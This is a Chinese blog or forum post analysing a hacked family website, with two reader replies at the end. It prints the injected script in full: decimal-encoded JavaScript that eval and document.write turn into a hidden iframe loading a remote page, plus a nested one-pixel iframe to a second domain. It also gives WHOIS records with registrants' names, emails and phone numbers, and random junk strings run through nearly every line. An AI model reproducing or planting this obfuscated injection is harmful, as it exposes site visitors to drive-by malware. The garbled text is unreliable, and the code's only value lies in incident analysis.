[原创]一篇刚写的分析木马手记

首发在我的博客里面， qm@c[b  
eW0:&*.vMj  
http://www.areway.cn/?p=175 IeZ}`$[H  
j#<#o:If  
DZ(e^vq  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： 73Tg{~  
          O/iew3YF  
<script>t=’60,105,102,114,97,109,101, Xj?j1R>GB  
32,115,114,99,61,104,116,116,112,58,47,47, %pe7[/

  
102,114,101,101,46,117,45,117,117,117,46,99, 0ot=BlMu  
110,47,101,114,114,111,114,46,104,116,109, {;=+#QK/  
32,119,105,100,116,104,61,49,48,48,32,104, nLJ]tpw^DH  
101,105,103,104,116,61,48,62,60,47,105,102, h:Npi `y  
114,97,109,101,62′; t.485L%  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> I^0bEwqZ~  
                                                                                                  nYTI\f/8v  
<script>t=’60,105,102,114,97,109,101,32,115, =r:D]?8oC  
114,99,61,104,116,116,112,58,47,47,102,114, H2p1gb#  
101,101,46,117,45,117,117,117,46,99,110,47, %~ZOQ%c1  
101,114,114,111,114,46,104,116,109,32,119, S'B7C>i`#N  
105,100,116,104,61,49,48,48,32,104,101,105, C(7LwV  
103,104,116,61,48,62,60,47,105,102,114,97, Hg*6I%D[So  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); `61VP-r  
document.write(t);</script> M@ ! {m  
                                                                                                  3QM.X^ANH  
<html xmlns=” / QSK$ZDC  
http://www.w3.org/1999/xhtml 2pxl!  
“> O9:vPbn  
<head> M I/9?B  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> X 4;+`  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> ]ZHC*r2i  
<title>首页 - 爱生活家庭网 x]Nq|XK  
                                                                                                                                                    }7wQFKME  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 c3g\*)Jz"F  
转换字符串后的大概内容是（谁点击后果自付）： X;6&:%ZL@^  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… 4$1sBY/  
                                                                                                                                  p+#uPY1#  
查询玉米u-uuu.cn的详细信息： ~?+Jt3?,  
Domain Name: u-uuu.cn "((6)U#  
ROID: 20070901s10001s64972306-cn htkn#s~=  
Domain Status: ok Jg/WE1p>  
Registrant Organization: 王雷 BVC\~j j  
Registrant Name: 王雷 /J wQ5  
Administrative Email: czlovexs@126.com ! FhN(L[=j  
Sponsoring Registrar: 北京万网志成科技有限公司 ~,m6g&>R  
Name Server:ns.yovole.com .' 3;Z'%"g  
Name Server:ns1.yovole.com pU<->d;->  
Registration Date: 2007-09-01 17:54 I>C;$Lp]  
Expiration Date: 2008-09-01 17:54 L+9a4/q  
最后PING了一下地址 都没有什么…. U3ED3) D  
                                                                                                UXR$7<D+  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. Nr uXXd  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> <+ >y GPp  
<script language=”javascript” src=” j""u:l^+x  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script &AoXv`l4
 
> . m@Sk`s  
这个玉米应该有可能是木马作者的： !sK{:6s  
foafau.info的详细信息： 5lVDYmh  
Access to INFO WHOIS information is provided to assist persons in coyy T  
determining the contents of a domain name registration record in the Wd3/Y/MD  
Afilias registry database. The data in this record is provided by y*2:(nI  
Afilias Limited for informational purposes only, and Afilias does not KR?-<  
guarantee its accuracy.  This service is intended only for query-based (VU: &.  
access. You agree that you will use this data only for lawful purposes ;~tKNytD`B  
and that, under no circumstances will you use this data to: (a) allow, dHg[0Br)r  
enable, or otherwise support the transmission by e-mail, telephone, or f*p=]]y  
facsimile of mass unsolicited, commercial advertising or solicitations <Mxy&9}ic  
to entities other than the data recipient’s own existing customers; or `:R8~>p  
(b) enable high volume, automated, electronic processes that send gX.4I;  
queries or data to the systems of Registry Operator, a Registrar, or JY4 +MApN  
Afilias except as reasonably necessary to register domain names or QEm6#y  
modify existing registrations. All rights reserved. Afilias reserves Z_ak4C  
the right to modify these terms at any time. By submitting this query, ?.,..p  
you agree to abide by this policy. LmseY(i N  
Domain ID:D22418703-LRMS P8:k"i/6J  
Domain Name:FOAFAU.INFO q: ?6  
Created On:20-Nov-2007 16:05:42 UTC cOxF.(L  
Last Updated On:20-Nov-2007 16:05:44 UTC gR?=z}`@p  
Expiration Date:20-Nov-2008 16:05:42 UTC 305()  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) ja
FBz&P/#  
Status:CLIENT DELETE PROHIBITED NcwZ_*sqj  
Status:CLIENT RENEW PROHIBITED W7_X=>l  
Status:CLIENT TRANSFER PROHIBITED #L`@["  
Status:CLIENT UPDATE PROHIBITED A)/_:  
Status:TRANSFER PROHIBITED BJB'o  
Registrant ID:GODA-040110615 ?R#-
gvX%  
Registrant Name:liu hong R*'rg-
d  
Registrant Organization: Go=MG:`  
Registrant Street1:beijing !J3g,p*  
Registrant Street2: sJw#^l  
Registrant Street3: CM!bD\5  
Registrant City:beijing =M*31>"I0  
Registrant State/Province: E}b" qOV  
Registrant Postal Code:100000 3.xsCcmP  
Registrant Country:CN qVx4 t"%L>  
Registrant Phone:+86.860108888777 rMdOE&5G  
Registrant Phone Ext.: gcQ>:mi  
Registrant FAX: mXAX%M U  
Registrant FAX Ext.: ![0\m2~iv  
Registrant Email:bbbshiji@163.com OLXG0@  
Admin ID:GODA-240110615 ,1a6u3f,  
Admin Name:liu hong 18zv]v %  
Admin Organization: 1I<fp $h  
Admin Street1:beijing u?&P6|J&  
Admin Street2: S)>L 0^M1  
Admin Street3: ;
mjk`6p  
Admin City:beijing [K9l>O  
Admin State/Province: p
>Qzz`@e  
Admin Postal Code:100000 -V%"i,t  
Admin Country:CN 4`7N}$j#,  
Admin Phone:+86.860108888777 dNUi|IYm$  
Admin Phone Ext.: qm{(.b^  
Admin FAX: ^"(CZvq  
Admin FAX Ext.: +>M^p2l*&  
Admin Email:bbbshiji@163.com |'aGj  
Billing ID:GODA-340110615 ~*79rDs
{  
Billing Name:liu hong v1oq[+  
Billing Organization: V
<*PaS..  
Billing Street1:beijing |~Z.l  
Billing Street2: )CD4k:bm  
Billing Street3: (1^AzE%U+Z  
Billing City:beijing @/9#Z4&d0  
Billing State/Province: I~-W4
{  
Billing Postal Code:100000 x&@. [FJhO  
Billing Country:CN zgI!S6q  
Billing Phone:+86.860108888777 '-N `u$3Y  
Billing Phone Ext.: N^*%{[<5  
Billing FAX: -r@fLkwg  
Billing FAX Ext.: sn+g#v9e  
Billing Email:bbbshiji@163.com Pv|g.hH9m  
Tech ID:GODA-140110615 &7VN?ox1  
Tech Name:liu hong |A0BYzlVc  
Tech Organization: F>dB@V-  
Tech Street1:beijing | (JxtQqQg  
Tech Street2: =8?y$WE  
Tech Street3: ?\"G
T]5D  
Tech City:beijing 3X=9$xw_  
Tech State/Province: K`{P/w  
Tech Postal Code:100000 ,.A@U*j
 
Tech Country:CN >-*rtiE  
Tech Phone:+86.860108888777 7l/.fSW  
Tech Phone Ext.: 7/&i'y  
Tech FAX: 3LN+gXmU  
Tech FAX Ext.: @tGju\E"o  
Tech Email:bbbshiji@163.com 7jL+c~  
Name Server:NS27.DOMAINCONTROL.COM ePv3M&\J  
Name Server:NS28.DOMAINCONTROL.COM WXV(R,*Tc  
Name Server: sEkfmB2J/  
Name Server: %IL] Wz<  
Name Server: aMe]6cWHV>  
Name Server: ]V0V8fU|  
Name Server: Z$LWZg  
Name Server: dWqKt0uh!  
Name Server: ?<)4
_  
Name Server: ~_8
Dv<"a  
Name Server: #I8)|p?P  
Name Server: I$7|?8  
Name Server: b"Hc==`  
                                                                                                          u1a0w  
接着下载每个文件里面的代码： I!eu|_cF  
一步一步看.. U*(/eEtd-  
uatY:GSR  
)eIC5>#.  
'K&^y%~py,  
IJa6W`}  
!xk`o
W  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来